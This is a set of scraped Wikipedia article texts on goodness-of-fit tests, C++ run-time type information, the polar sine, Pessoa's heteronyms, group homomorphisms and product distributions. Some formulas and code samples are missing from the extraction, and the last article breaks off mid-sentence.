This has approximately a chi-square distribution withk− 1 degrees of freedom. The fact that there arek− 1 degrees of freedom is a consequence of the restriction∑Ni=n{\textstyle \sum N_{i}=n}. We know there arekobserved bin counts, however, once anyk− 1 are known, the remaining one is uniquely determined. Basically, one can say, there are onlyk− 1 freely determined binn counts, thusk− 1 degrees of freedom.
G-testsarelikelihood-ratiotests ofstatistical significancethat are increasingly being used in situations where Pearson's chi-square tests were previously recommended.[7]
The general formula forGis
whereOi{\textstyle O_{i}}andEi{\textstyle E_{i}}are the same as for the chi-square test,ln{\textstyle \ln }denotes thenatural logarithm, and the sum is taken over all non-empty bins. Furthermore, the total observed count should be equal to the total expected count:∑iOi=∑iEi=N{\displaystyle \sum _{i}O_{i}=\sum _{i}E_{i}=N}whereN{\textstyle N}is the total number of observations.
G-tests have been recommended at least since the 1981 edition of the popular statistics textbook byRobert R. SokalandF. James Rohlf.[8]
|
https://en.wikipedia.org/wiki/Goodness_of_fit
|
In computer programming,run-time type informationorrun-time type identification(RTTI)[1]is a feature of some programming languages (such asC++,[2]Object Pascal, andAda[3]) that exposes information about an object'sdata typeatruntime. Run-time type information may be available for all types or only to types that explicitly have it (as is the case with Ada). Run-time type information is a specialization of a more general concept calledtype introspection.
In the original C++ design,Bjarne Stroustrupdid not include run-time type information, because he thought this mechanism was often misused.[4]
In C++, RTTI can be used to do safetypecastsusing thedynamic_cast<>operator, and to manipulate type information at runtime using thetypeidoperator andstd::type_infoclass. In Object Pascal, RTTI can be used to perform safe type casts with theasoperator, test the class to which an object belongs with theisoperator, and manipulate type information at run time with classes contained in theRTTIunit[5](i.e. classes:TRttiContext,TRttiInstanceType, etc.). In Ada, objects of tagged types also store a type tag, which permits the identification of the type of these object at runtime. Theinoperator can be used to test, at runtime, if an object is of a specific type and may be safely converted to it.[6]
RTTI is available only for classes that arepolymorphic, which means they have at least onevirtual method. In practice, this is not a limitation because base classes must have avirtual destructorto allow objects of derived classes to perform proper cleanup if they are deleted from a base pointer.
Some compilers have flags to disable RTTI. Using these flags may reduce the overall size of the application, making them especially useful when targeting systems with a limited amount of memory.[7]
Thetypeidreserved word(keyword) is used to determine theclassof anobjectat runtime. It returns areferencetostd::type_infoobject, which exists until the end of the program.[8]The use oftypeid, in a non-polymorphic context, is often preferred overdynamic_cast<class_type>in situations where just the class information is needed, becausetypeidis always aconstant-timeprocedure, whereasdynamic_castmay need to traverse the class derivation lattice of its argument at runtime.[citation needed]Some aspects of the returned object are implementation-defined, such asstd::type_info::name(), and cannot be relied on across compilers to be consistent.
Objects of classstd::bad_typeidare thrown when the expression fortypeidis the result of applying the unary * operator on anull pointer. Whether an exception is thrown for other null reference arguments is implementation-dependent. In other words, for the exception to be guaranteed, the expression must take the formtypeid(*p)wherepis any expression resulting in a null pointer.
Output (exact output varies by system and compiler):
Thedynamic_castoperator inC++is used fordowncastinga reference or pointer to a more specific type in theclass hierarchy. Unlike thestatic_cast, the target of thedynamic_castmust be apointerorreferencetoclass. Unlikestatic_castandC-styletypecast (where type check occurs while compiling), a type safety check is performed at runtime. If the types are not compatible, anexceptionwill be thrown (when dealing withreferences) or anull pointerwill be returned (when dealing withpointers).
AJavatypecast behaves similarly; if the object being cast is not actually an instance of the target type, and cannot be converted to one by a language-defined method, an instance ofjava.lang.ClassCastExceptionwill be thrown.[9]
Suppose somefunctiontakes anobjectof typeAas its argument, and wishes to perform some additional operation if the object passed is an instance ofB, asubclassofA. This can be done usingdynamic_castas follows.
Console output:
A similar version ofMyFunctioncan be written withpointersinstead ofreferences:
In Object Pascal andDelphi, the operatorisis used to check the type of a class at runtime. It tests the belonging of an object to a given class, including classes of individual ancestors present in the inheritance hierarchy tree (e.g.Button1is aTButtonclass that has ancestors:TWinControl→TControl→TComponent→TPersistent→TObject, where the latter is the ancestor of all classes). The operatorasis used when an object needs to be treated at run time as if it belonged to an ancestor class.
The RTTI unit is used to manipulate object type information at run time. This unit contains a set of classes that allow you to: get information about an object's class and its ancestors, properties, methods and events, change property values and call methods. The following example shows the use of the RTTI module to obtain information about the class to which an object belongs, creating it, and to call its method. The example assumes that the TSubject class has been declared in a unit named SubjectUnit.
|
https://en.wikipedia.org/wiki/Dynamic_cast
|
Ingeometry, thepolar sinegeneralizes thesine functionofangleto thevertex angleof apolytope. It is denoted bypsin.
Letv1, ...,vn(n≥ 1) be non-zeroEuclidean vectorsinn-dimensional space(Rn) that are directed from avertexof aparallelotope, forming the edges of the parallelotope. The polar sine of the vertex angle is:
where the numerator is thedeterminant
which equals thesigned hypervolumeof the parallelotope with vector edges[1]
and where the denominator is then-foldproduct
of themagnitudesof the vectors, which equals the hypervolume of then-dimensionalhyperrectanglewith edges equal to the magnitudes of the vectors ||v1||, ||v2||, ... ||vn|| rather than the vectors themselves. Also see Ericksson.[2]
The parallelotope is like a "squashed hyperrectangle", so it has less hypervolume than the hyperrectangle, meaning (see image for the 3d case):
as for the ordinary sine, with either bound being reached only in the case that all vectors are mutuallyorthogonal.
In the casen= 2, the polar sine is the ordinarysineof the angle between the two vectors.
A non-negative version of the polar sine that works in anym-dimensional space can be defined using theGram determinant. It is a ratio where the denominator is as described above. The numerator is
where the superscript T indicatesmatrix transposition. This can be nonzero only ifm≥n. In the casem=n, this is equivalent to theabsolute valueof the definition given previously. In the degenerate casem<n, the determinant will be of asingularn×nmatrix, givingΩ = 0andpsin = 0, because it is not possible to havenlinearly independent vectors inm-dimensional space whenm<n.
The polar sine changes sign whenever two vectors are interchanged, due to the antisymmetry ofrow-exchangingin the determinant; however, its absolute value will remain unchanged.
The polar sine does not change if all of the vectorsv1, ...,vnarescalar-multipliedby positive constantsci, due tofactorization
If anodd numberof these constants are instead negative, then the sign of the polar sine will change; however, its absolute value will remain unchanged.
If the vectors are notlinearly independent, the polar sine will be zero. This will always be so in thedegenerate casethat the number of dimensionsmis strictly less than the number of vectorsn.
Thecosineof the angle between two non-zero vectors is given by
using thedot product. Comparison of this expression to the definition of the absolute value of the polar sine as given above gives:
In particular, forn= 2, this is equivalent to
which is thePythagorean theorem.
Polar sines were investigated byEulerin the 18th century.[3]
|
https://en.wikipedia.org/wiki/Polar_sine
|
Theliteraryconcept of theheteronymrefers to one or more imaginary character(s) created by a writer to write in different styles. Heteronyms differ frompen names(orpseudonyms, from the Greek words for "false" and "name") in that the latter are just false names, while the former are characters that have their own supposed physiques, biographies, and writing styles.[1]
Heteronyms were named and developed by thePortuguesewriter and poetFernando Pessoain the early 20th century, but they were thoroughly explored by the Danish philosopherKierkegaardin the 19th century and have also been used by other writers.
In Pessoa's case, there are at least 70 heteronyms (according to the latest count by Pessoa's editor Teresa Rita Lopes). Some of them are relatives or know each other; they criticise and translate each other's works. Pessoa's three chief heteronyms areAlberto Caeiro,Ricardo ReisandÁlvaro de Campos; the latter two consider the former their master. There are also two whom Pessoa calledsemi-heteronyms,Bernardo Soaresand the Baron of Teive, who are semi-autobiographical characters who write in prose, "a mere mutilation" of the Pessoa personality. There is, lastly, anorthonym,Fernando Pessoa, the namesake of the author, who also considers Caeiro his master.
The heteronyms dialogue with each other and even with Pessoa in what he calls "the theatre of being" or "drama in people". They sometimes intervened in Pessoa's social life: during Pessoa's only attested romance, a jealous Campos wrote letters to the girl, who enjoyed the game and wrote back.
Pessoa, also an amateur astrologer, created in 1915 the heteronym Raphael Baldaya, a long bearded astrologer. He elaborated horoscopes of his main heteronyms in order to determine their personalities.
Fernando Pessoa on the heteronyms
How do I write in the name of these three? Caeiro, through sheer and unexpected inspiration, without knowing or even suspecting that I'm going to write in his name. Ricardo Reis, after an abstract meditation, which suddenly takes concrete shape in an ode. Campos, when I feel a sudden impulse to write and don't know what. (My semi-heteronym Bernardo Soares, who in many ways resembles Álvaro de Campos, always appears when I'm sleepy or drowsy, so that my qualities of inhibition and rational thought are suspended; his prose is an endless reverie. He's a semi-heteronym because his personality, although not my own, doesn't differ from my own but is a mere mutilation of it. He's me without my rationalism and emotions. His prose is the same as mine, except for certain formal restraint that reason imposes on my own writing, and his Portuguese is exactly the same – whereas Caeiro writes bad Portuguese, Campos writes it reasonably well but with mistakes such as "me myself" instead of "I myself", etc.., and Reis writes better than I, but with a purism I find excessive...)
George Steiner on the heteronyms
Pseudonymous writing is not rare in literature or philosophy (Kierkegaard provides a celebrated instance). 'Heteronyms', as Pessoa called and defined them, are something different and exceedingly strange. For each of his 'voices', Pessoa conceived a highly distinctive poetic idiom and technique, a complex biography, a context of literary influence and polemics and, most arrestingly of all, subtle interrelations and reciprocities of awareness. Octavio Paz defines Caeiro as 'everything that Pessoa is not and more'.
He is a man magnificently at home in nature, a virtuoso of pre-Christian innocence, almost a Portuguese teacher of Zen. Reis is a stoic Horatian, a pagan believer in fate, a player with classical myths less original than Caeiro, but more representative of modern symbolism. De Campos emerges as a Whitmanesque futurist, a dreamer in drunkenness, the Dionysian singer of what is oceanic and windswept in Lisbon. None of this triad resembles the metaphysical solitude, the sense of being an occultist medium which characterise Pessoa's 'own' intimate verse.
Richard Zenith on the heteronyms
Álvaro de Campos, the poet-persona who grew old with Pessoa and held a privileged place in his inventor's hearts. Soares, the assistant bookkeeper and Campos, the naval engineer never met in the pen-and-paper drama of Pessoa's heteronyms, who were frequently pitted against one other, but the two writer-characters were spiritual brothers, even if their worldly occupations were at odds. Campos wrote prose, as well as poetry, and much of it reads at it came, so to speak, from the hand of Soares. Pessoa was often unsure who was writing when he wrote, and it's curious that the very first item among the more than 25,000 pieces that make up his archives in the National Library of Lisbon bears the headingA. de C. (?) or B. de D. (or something else).
This heteronym was created byFernando Pessoaas analter egowho inherited his role fromAlexander Searchand this one fromCharles Robert Anon. The latter was created when Pessoa lived inDurban, while Search was created in 1906, when Pessoa was a student at Lisbon's University, in search of his Portuguese cultural identity, after his return fromDurban.
Anon was supposedly English, while Search, although English, was born in Lisbon. After the Portuguese republican revolution, in 1910, and consequent patriotic atmosphere, Pessoa dropped his English heteronyms andÁlvaro de Camposwas created as a Portuguesealter ego. Álvaro de Campos, born in 1890, was supposedly a Portuguese naval engineer graduated inGlasgow.
Campos sailed to the Orient, living experiences that he describes in his poem "Opiarium". He worked in London (1915), Barrow on Furness and Newcastle (1922), but became unemployed, and returned to Lisbon in 1926, the year of the military putsch that installed dictatorship. He also wrote "Lisbon Revisited (1923)" and "Lisbon Revisited (1926)".
Campos was adecadentpoet, but he embracedFuturism; his poetry was strongly influenced byWalt WhitmanandMarinetti. He wrote the "Ode Triumphal" and "Ode Maritime", published in the literary journalOrpheu, in 1915, and other unfinished.
While unemployed in Lisbon, he became depressed, returning toDecadentismandPessimism. Then he wrote his master work, "Tobacco Shop", published in 1933, in the literary journalPresença.
Pessoa created this heteronym as "Master" of the other heteronyms and even Pessoa himself.
This fictional character was born in 1889 and died in 1915, at 26, almost the same age as Pessoa's best friendMário de Sá-Carneiro, who killed himself in Paris in 1916 less than a month shy of his 26th birthday. Thus, Sá-Carneiro seems to have inspired, at least partially, Alberto Caeiro.
Caeiro was a humble man of poor education, but a great poet "naif", he was born in Lisbon, but lives almost his life in the countryside, Ribatejo, near Lisbon, where he died. However, his poetry is full of philosophy. He wrote "Poemas Inconjuntos" (Disconnected Poems) and "O Guardador de Rebanhos" (The Keeper of Sheep), published byFernando Pessoain his "Art Journal"Athenain 1924–25.
In a famous letter to the literary critic Adolfo Casais Monteiro, dated January 13, 1935, Pessoa describes his "triumphal day", March 8, 1914, when Caeiro "appeared", making him write down all the poetry of "The Keeper of Sheep" at once. Caeiro influenced theNeopaganismof Pessoa, and of the heteronyms António Mora and Ricardo Reis. Poetically, he influenced mainly the Neoclassicism of Reis, which is connected to Paganism.
This heteronym was created byPessoaas a Portuguese doctor born inPorto, on September 19, 1887. Reis supposedly studied at a boarding school run byJesuitsin which he received a classical education. He was an amateurlatinistand poet; politically a monarchist, he went into exile to Brazil after the defeat of a monarchical rebellion against thePortuguese Republicin 1919. Ricardo Reis reveals hisEpicureanismandStoicismin the "Odes by Ricardo Reis", published byPessoain 1924, in his literary journalAthena.
SincePessoadidn't determine the death of Reis, one can assume that he survived his author who died in 1935. InThe Year of the Death of Ricardo Reis(1984), PortugueseNobel prizewinnerJosé Saramagorebuilds, in his own personal outlook, the literary world of this heteronym after 1935, creating a dialog between Ricardo Reis and the ghost of his author.
See the introductory parts in:
|
https://en.wikipedia.org/wiki/Heteronym_(literature)
|
Inmathematics, given twogroups, (G,∗) and (H, ·), agroup homomorphismfrom (G,∗) to (H, ·) is afunctionh:G→Hsuch that for alluandvinGit holds that
where the group operation on the left side of the equation is that ofGand on the right side that ofH.
From this property, one can deduce thathmaps theidentity elementeGofGto the identity elementeHofH,
and it also maps inverses to inverses in the sense that
Hence one can say thath"is compatible with the group structure".
In areas of mathematics where one considers groups endowed with additional structure, ahomomorphismsometimes means a map which respects not only the group structure (as above) but also the extra structure. For example, a homomorphism oftopological groupsis often required to be continuous.
LeteH{\displaystyle e_{H}}be the identity element of the (H, ·) group andu∈G{\displaystyle u\in G}, then
Now by multiplying for the inverse ofh(u){\displaystyle h(u)}(or applying the cancellation rule) we obtain
Similarly,
Therefore for the uniqueness of the inverse:h(u−1)=h(u)−1{\displaystyle h(u^{-1})=h(u)^{-1}}.
We define thekernelof hto be the set of elements inGwhich are mapped to the identity inH
and theimageof hto be
The kernel and image of a homomorphism can be interpreted as measuring how close it is to being an isomorphism. Thefirst isomorphism theoremstates that the image of a group homomorphism,h(G) is isomorphic to the quotient groupG/kerh.
The kernel of h is anormal subgroupofG. Assumeu∈ker(h){\displaystyle u\in \operatorname {ker} (h)}and showg−1∘u∘g∈ker(h){\displaystyle g^{-1}\circ u\circ g\in \operatorname {ker} (h)}for arbitraryu,g{\displaystyle u,g}:
The image of h is asubgroupofH.
The homomorphism,h, is agroup monomorphism; i.e.,his injective (one-to-one) if and only ifker(h) = {eG}. Injection directly gives that there is a unique element in the kernel, and, conversely, a unique element in the kernel gives injection:
forms a group under matrix multiplication. For any complex numberuthe functionfu:G→C*defined by
Ifh:G→Handk:H→Kare group homomorphisms, then so isk∘h:G→K. This shows that the class of all groups, together with group homomorphisms as morphisms, forms acategory(specifically thecategory of groups).
IfGandHareabelian(i.e., commutative) groups, then the setHom(G,H)of all group homomorphisms fromGtoHis itself an abelian group: the sumh+kof two homomorphisms is defined by
The commutativity ofHis needed to prove thath+kis again a group homomorphism.
The addition of homomorphisms is compatible with the composition of homomorphisms in the following sense: iffis inHom(K,G),h,kare elements ofHom(G,H), andgis inHom(H,L), then
Since the composition isassociative, this shows that the set End(G) of all endomorphisms of an abelian group forms aring, theendomorphism ringofG. For example, the endomorphism ring of the abelian group consisting of thedirect sumofmcopies ofZ/nZis isomorphic to the ring ofm-by-mmatriceswith entries inZ/nZ. The above compatibility also shows that the category of all abelian groups with group homomorphisms forms apreadditive category; the existence of direct sums and well-behaved kernels makes this category the prototypical example of anabelian category.
|
https://en.wikipedia.org/wiki/Group_homomorphism
|
Aproduct distributionis aprobability distributionconstructed as the distribution of theproductofrandom variableshaving two other known distributions. Given twostatistically independentrandom variablesXandY, the distribution of the random variableZthat is formed as the productZ=XY{\displaystyle Z=XY}is aproduct distribution.
The product distribution is the PDF of the product of sample values. This is not the same as the product of their PDFs yet the concepts are often ambiguously termed as in "product of Gaussians".
The product is one type of algebra for random variables: Related to the product distribution are theratio distribution, sum distribution (seeList of convolutions of probability distributions) and difference distribution. More generally, one may talk of combinations of sums, differences, products and ratios.
Many of these distributions are described in Melvin D. Springer's book from 1979The Algebra of Random Variables.[1]
IfX{\displaystyle X}andY{\displaystyle Y}are two independent, continuous random variables, described by probability density functionsfX{\displaystyle f_{X}}andfY{\displaystyle f_{Y}}then the probability density function ofZ=XY{\displaystyle Z=XY}is[2]
We first write thecumulative distribution functionofZ{\displaystyle Z}starting with its definition
We find the desired probability density function by taking the derivative of both sides with respect toz{\displaystyle z}. Since on the right hand side,z{\displaystyle z}appears only in the integration limits, the derivative is easily performed using thefundamental theorem of calculusand thechain rule. (Note the negative sign that is needed when the variable occurs in the lower limit of the integration.)
where the absolute value is used to conveniently combine the two terms.[3]
A faster more compact proof begins with the same step of writing the cumulative distribution ofZ{\displaystyle Z}starting with its definition:
whereu(⋅){\displaystyle u(\cdot )}is theHeaviside step functionand serves to limit the region of integration to values ofx{\displaystyle x}andy{\displaystyle y}satisfyingxy≤z{\displaystyle xy\leq z}.
We find the desired probability density function by taking the derivative of both sides with respect toz{\displaystyle z}.
where we utilize the translation and scaling properties of theDirac delta functionδ{\displaystyle \delta }.
A more intuitive description of the procedure is illustrated in the figure below. The joint pdffX(x)fY(y){\displaystyle f_{X}(x)f_{Y}(y)}exists in thex{\displaystyle x}-y{\displaystyle y}plane and an arc of constantz{\displaystyle z}value is shown as the shaded line. To find the marginal probabilityfZ(z){\displaystyle f_{Z}(z)}on this arc, integrate over increments of areadxdyf(x,y){\displaystyle dx\,dy\;f(x,y)}on this contour.
Starting withy=zx{\displaystyle y={\frac {z}{x}}}, we havedy=−zx2dx=−yxdx{\displaystyle dy=-{\frac {z}{x^{2}}}\,dx=-{\frac {y}{x}}\,dx}. So the probability increment isδp=f(x,y)dx|dy|=fX(x)fY(z/x)y|x|dxdx{\displaystyle \delta p=f(x,y)\,dx\,|dy|=f_{X}(x)f_{Y}(z/x){\frac {y}{|x|}}\,dx\,dx}. Sincez=yx{\displaystyle z=yx}impliesdz=ydx{\displaystyle dz=y\,dx}, we can relate the probability increment to thez{\displaystyle z}-increment, namelyδp=fX(x)fY(z/x)1|x|dxdz{\displaystyle \delta p=f_{X}(x)f_{Y}(z/x){\frac {1}{|x|}}\,dx\,dz}. Then integration overx{\displaystyle x}, yieldsfZ(z)=∫fX(x)fY(z/x)1|x|dx{\displaystyle f_{Z}(z)=\int f_{X}(x)f_{Y}(z/x){\frac {1}{|x|}}\,dx}.
LetX∼f(x){\displaystyle X\sim f(x)}be a random sample drawn from probability distributionfx(x){\displaystyle f_{x}(x)}. ScalingX{\displaystyle X}byθ{\displaystyle \theta }generates a sample from scaled distributionθX∼1|θ|fX(xθ){\displaystyle \theta X\sim {\frac {1}{|\theta |}}f_{X}\left({\frac {x}{\theta }}\right)}which can be written as a conditional distributiongx(x|θ)=1|θ|fx(xθ){\displaystyle g_{x}(x|\theta )={\frac {1}{|\theta |}}f_{x}\left({\frac {x}{\theta }}\right)}.
Lettingθ{\displaystyle \theta }be a random variable with pdffθ(θ){\displaystyle f_{\theta }(\theta )}, the distribution of the scaled sample becomesfX(θx)=gX(x∣θ)fθ(θ){\displaystyle f_{X}(\theta x)=g_{X}(x\mid \theta )f_{\theta }(\theta )}and integrating outθ{\displaystyle \theta }we gethx(x)=∫−∞∞gX(x|θ)fθ(θ)dθ{\displaystyle h_{x}(x)=\int _{-\infty }^{\infty }g_{X}(x|\theta )f_{\theta }(\theta )d\theta }soθX{\displaystyle \theta X}is drawn from this distributionθX∼hX(x){\displaystyle \theta X\sim h_{X}(x)}. However, substituting the definition ofg{\displaystyle g}we also havehX(x)=∫−∞∞1|θ|fx(xθ)fθ(θ)dθ{\displaystyle h_{X}(x)=\int _{-\infty }^{\infty }{\frac {1}{|\theta |}}f_{x}\left({\frac {x}{\theta }}\right)f_{\theta }(\theta )\,d\theta }which has the same form as the product distribution above. Thus the Bayesian posterior distributionhX(x){\displaystyle h_{X}(x)}is the distribution of the product of the two independent random samplesθ{\displaystyle \theta }andX{\displaystyle X}.
For the case of one variable being discrete, letθ{\displaystyle \theta }have probabilityPi{\displaystyle P_{i}}at levelsθi{\displaystyle \theta _{i}}with∑iPi=1{\displaystyle \sum _{i}P_{i}=1}. The conditional density isfX(x∣θi)=1|θi|fx(xθi){\displaystyle f_{X}(x\mid \theta _{i})={\frac {1}{|\theta _{i}|}}f_{x}\left({\frac {x}{\theta _{i}}}\right)}. ThereforefX(θx)=∑iPi|θi|fX(xθi){\displaystyle f_{X}(\theta x)=\sum _{i}{\frac {P_{i}}{|\theta _{i}|}}f_{X}\left({\frac {x}{\theta _{i}}}\right)}.
When two random variables are statistically independent,the expectation of their product is the product of their expectations. This can be proved from thelaw of total expectation:
In the inner expression,Yis a constant. Hence:
This is true even ifXandYare statistically dependent in which caseE[X∣Y]{\displaystyle \operatorname {E} [X\mid Y]}is a function ofY. In the special case in whichXandYare statistically
independent, it is a constant independent ofY. Hence:
LetX,Y{\displaystyle X,Y}be uncorrelated random variables with meansμX,μY,{\displaystyle \mu _{X},\mu _{Y},}and variancesσX2,σY2{\displaystyle \sigma _{X}^{2},\sigma _{Y}^{2}}.
If, additionally, the random variablesX2{\displaystyle X^{2}}andY2{\displaystyle Y^{2}}are uncorrelated, then the variance of the productXYis[4]
In the case of the product of more than two variables, ifX1⋯Xn,n>2{\displaystyle X_{1}\cdots X_{n},\;\;n>2}are statistically independent then[5]the variance of their product is
AssumeX,Yare independent random variables. The characteristic function ofXisφX(t){\displaystyle \varphi _{X}(t)}, and the distribution ofYis known. Then from thelaw of total expectation, we have[6]
If the characteristic functions and distributions of bothXandYare known, then alternatively,φZ(t)=E(φY(tX)){\displaystyle \varphi _{Z}(t)=\operatorname {E} (\varphi _{Y}(tX))}also holds.
TheMellin transformof a distributionf(x){\displaystyle f(x)}with supportonlyonx≥0{\displaystyle x\geq 0}and having a random sampleX{\displaystyle X}is
The inverse transform is
ifXandY{\displaystyle X{\text{ and }}Y}are two independent random samples from different distributions, then the Mellin transform of their product is equal to the product of their Mellin transforms:
Ifsis restricted to integer values, a simpler result is
Thus the moments of the random productXY{\displaystyle XY}are the product of the corresponding moments ofXandY{\displaystyle X{\text{ and }}Y}and this extends to non-integer moments, for example
The pdf of a function can be reconstructed from its moments using thesaddlepoint approximation method.
A further result is that for independentX,Y
Gamma distribution exampleTo illustrate how the product of moments yields a much simpler result than finding the moments of the distribution of the product, letX,Y{\displaystyle X,Y}be sampled from twoGamma distributions,fGamma(x;θ,1)=Γ(θ)−1xθ−1e−x{\displaystyle f_{Gamma}(x;\theta ,1)=\Gamma (\theta )^{-1}x^{\theta -1}e^{-x}}with parametersθ=α,β{\displaystyle \theta =\alpha ,\beta }whose moments are
Multiplying the corresponding moments gives the Mellin transform result
Independently, it is known that the product of two independent Gamma-distributed samples (~Gamma(α,1) and Gamma(β,1)) has aK-distribution:
To find the moments of this, make the change of variabley=2z{\displaystyle y=2{\sqrt {z}}}, simplifying similar integrals to:
thus
The definite integral
which, after some difficulty, has agreed with the moment product result above.
IfX,Yare drawn independently from Gamma distributions with shape parametersα,β{\displaystyle \alpha ,\;\beta }then
This type of result is universally true, since for bivariate independent variablesfX,Y(x,y)=fX(x)fY(y){\displaystyle f_{X,Y}(x,y)=f_{X}(x)f_{Y}(y)}thus
or equivalently it is clear thatXpandYq{\displaystyle X^{p}{\text{ and }}Y^{q}}are independent variables.
The distribution of the product of two random variables which havelognormal distributionsis again lognormal. This is itself a special case of a more general set of results where the logarithm of the product can be written as the sum of the logarithms. Thus, in cases where a simple result can be found in thelist of convolutions of probability distributions, where the distributions to be convolved are those of the logarithms of the components of the product, the result might be transformed to provide the distribution of the product. However this approach is only useful where the logarithms of the components of the product are in some standard families of distributions.
LetZ{\displaystyle Z}be the product of two independent variablesZ=X1X2{\displaystyle Z=X_{1}X_{2}}each uniformly distributed on the interval [0,1], possibly the outcome of acopulatransformation. As noted in "Lognormal Distributions" above, PDF convolution operations in the Log domain correspond to the product of sample values in the original domain. Thus, making the transformationu=ln(x){\displaystyle u=\ln(x)}, such thatpU(u)|du|=pX(x)|dx|{\displaystyle p_{U}(u)\,|du|=p_{X}(x)\,|dx|}, each variate is distributed independently onuas
and the convolution of the two distributions is the autoconvolution
Next retransform the variable toz=ey{\displaystyle z=e^{y}}yielding the distribution
For the product of multiple (> 2) independent samples thecharacteristic functionroute is favorable. If we definey~=−y{\displaystyle {\tilde {y}}=-y}thenc(y~){\displaystyle c({\tilde {y}})}above is aGamma distributionof shape 1 and scale factor 1,c(y~)=y~e−y~{\displaystyle c({\tilde {y}})={\tilde {y}}e^{-{\tilde {y}}}}, and its known CF is(1−it)−1{\displaystyle (1-it)^{-1}}. Note that|dy~|=|dy|{\displaystyle |d{\tilde {y}}|=|dy|}so the Jacobian of the transformation is unity.
The convolution ofn{\displaystyle n}independent samples fromY~{\displaystyle {\tilde {Y}}}therefore has CF(1−it)−n{\displaystyle (1-it)^{-n}}which is known to be the CF of a Gamma distribution of shapen{\displaystyle n}:
Make the inverse transformationz=ey{\displaystyle z=e^{y}}to extract the PDF of the product of thensamples:
The following, more conventional, derivation from Stackexchange[7]is consistent with this result.
First of all, lettingZ2=X1X2{\displaystyle Z_{2}=X_{1}X_{2}}its CDF is
The density ofz2is thenf(z2)=−log(z2){\displaystyle z_{2}{\text{ is then }}f(z_{2})=-\log(z_{2})}
Multiplying by a third independent sample gives distribution function
Taking the derivative yieldsfZ3(z)=12log2(z),0<z≤1.{\displaystyle f_{Z_{3}}(z)={\frac {1}{2}}\log ^{2}(z),\;\;0<z\leq 1.}
The author of the note conjectures that, in general,fZn(z)=(−logz)n−1(n−1)!,0<z≤1{\displaystyle f_{Z_{n}}(z)={\frac {(-\log z)^{n-1}}{(n-1)!\;\;\;}},\;\;0<z\leq 1}
The figure illustrates the nature of the integrals above. The area of the selection within the unit square and below the line z = xy, represents the CDF of z. This divides into two parts. The first is for 0 < x < z where the increment of area in the vertical slot is just equal todx. The second part lies below thexyline, hasy-heightz/x, and incremental areadx z/x.
The product of two independent Normal samples follows amodified Bessel function. Letx,y{\displaystyle x,y}be independent samples from a Normal(0,1) distribution andz=xy{\displaystyle z=xy}.
Then
The variance of this distribution could be determined, in principle, by a definite integral from Gradsheyn and Ryzhik,[8]
thusE[Z2]=∫−∞∞z2K0(|z|)πdz=4πΓ2(32)=1{\displaystyle \operatorname {E} [Z^{2}]=\int _{-\infty }^{\infty }{\frac {z^{2}K_{0}(|z|)}{\pi }}\,dz={\frac {4}{\pi }}\;\Gamma ^{2}{\Big (}{\frac {3}{2}}{\Big )}=1}
A much simpler result, stated in a section above, is that the variance of the product of zero-mean independent samples is equal to the product of their variances. Since the variance of each Normal sample is one, the variance of the product is also one.
The product of two Gaussian samples is often confused with the product of two Gaussian PDFs. The latter simply results in a bivariate Gaussian distribution.
The product of correlated Normal samples case was recently addressed by Nadarajaha and Pogány.[9]LetX,Y{\displaystyle X{\text{, }}Y}be zero mean, unit variance, normally distributed variates with correlation coefficientρand letZ=XY{\displaystyle \rho {\text{ and let }}Z=XY}
Then
Mean and variance: For the mean we haveE[Z]=ρ{\displaystyle \operatorname {E} [Z]=\rho }from the definition of correlation coefficient. The variance can be found by transforming from two unit variance zero mean uncorrelated variablesU, V. Let
ThenX, Yare unit variance variables with correlation coefficientρ{\displaystyle \rho }and
Removing odd-power terms, whose expectations are obviously zero, we get
Since(E[Z])2=ρ2{\displaystyle (\operatorname {E} [Z])^{2}=\rho ^{2}}we have
High correlation asymptoteIn the highly correlated case,ρ→1{\displaystyle \rho \rightarrow 1}the product converges on the square of one sample. In this case theK0{\displaystyle K_{0}}asymptote isK0(x)→π2xe−xin the limit asx=|z|1−ρ2→∞{\displaystyle K_{0}(x)\rightarrow {\sqrt {\tfrac {\pi }{2x}}}e^{-x}{\text{ in the limit as }}x={\frac {|z|}{1-\rho ^{2}}}\rightarrow \infty }and
which is aChi-squared distributionwith one degree of freedom.
Multiple correlated samples. Nadarajaha et al. further show that ifZ1,Z2,..Znaren{\displaystyle Z_{1},Z_{2},..Z_{n}{\text{ are }}n}iid random variables sampled fromfZ(z){\displaystyle f_{Z}(z)}andZ¯=1n∑Zi{\displaystyle {\bar {Z}}={\tfrac {1}{n}}\sum Z_{i}}is their mean then
whereWis the Whittaker function whileβ=n1−ρ,γ=n1+ρ{\displaystyle \beta ={\frac {n}{1-\rho }},\;\;\gamma ={\frac {n}{1+\rho }}}.
Using the identityW0,ν(x)=xπKν(x/2),x≥0{\displaystyle W_{0,\nu }(x)={\sqrt {\frac {x}{\pi }}}K_{\nu }(x/2),\;\;x\geq 0}, see for example the DLMF compilation. eqn(13.13.9),[10]this expression can be somewhat simplified to
The pdf gives the marginal distribution of a sample bivariate normal covariance, a result also shown in the Wishart Distribution article. The approximate distribution of a correlation coefficient can be found via theFisher transformation.
Multiple non-central correlated samples. The distribution of the product of correlated non-central normal samples was derived by Cui et al.[11]and takes the form of an infinite series of modified Bessel functions of the first kind.
Moments of product of correlated central normal samples
For a centralnormal distributionN(0,1) the moments are
wheren!!{\displaystyle n!!}denotes thedouble factorial.
IfX,Y∼Norm(0,1){\displaystyle X,Y\sim {\text{Norm}}(0,1)}are central correlated variables, the simplest bivariate case of the multivariate normal moment problem described by Kan,[12]then
where
[needs checking]
The distribution of the product of non-central correlated normal samples was derived by Cui et al.[11]and takes the form of an infinite series.
These product distributions are somewhat comparable to theWishart distribution. The latter is thejointdistribution of the four elements (actually only three independent elements) of a sample covariance matrix. Ifxt,yt{\displaystyle x_{t},y_{t}}are samples from a bivariate time series then theW=∑t=1K(xtyt)(xtyt)T{\displaystyle W=\sum _{t=1}^{K}{\dbinom {x_{t}}{y_{t}}}{\dbinom {x_{t}}{y_{t}}}^{T}}is a Wishart matrix withKdegrees of freedom. The product distributions above are the unconditional distribution of the aggregate ofK> 1 samples ofW2,1{\displaystyle W_{2,1}}.
Letu1,v1,u2,v2{\displaystyle u_{1},v_{1},u_{2},v_{2}}be independent samples from a normal(0,1) distribution.Settingz1=u1+iv1andz2=u2+iv2thenz1,z2{\displaystyle z_{1}=u_{1}+iv_{1}{\text{ and }}z_{2}=u_{2}+iv_{2}{\text{ then }}z_{1},z_{2}}are independent zero-mean complex normal samples with circular symmetry. Their complex variances areVar|zi|=2.{\displaystyle \operatorname {Var} |z_{i}|=2.}
The density functions of
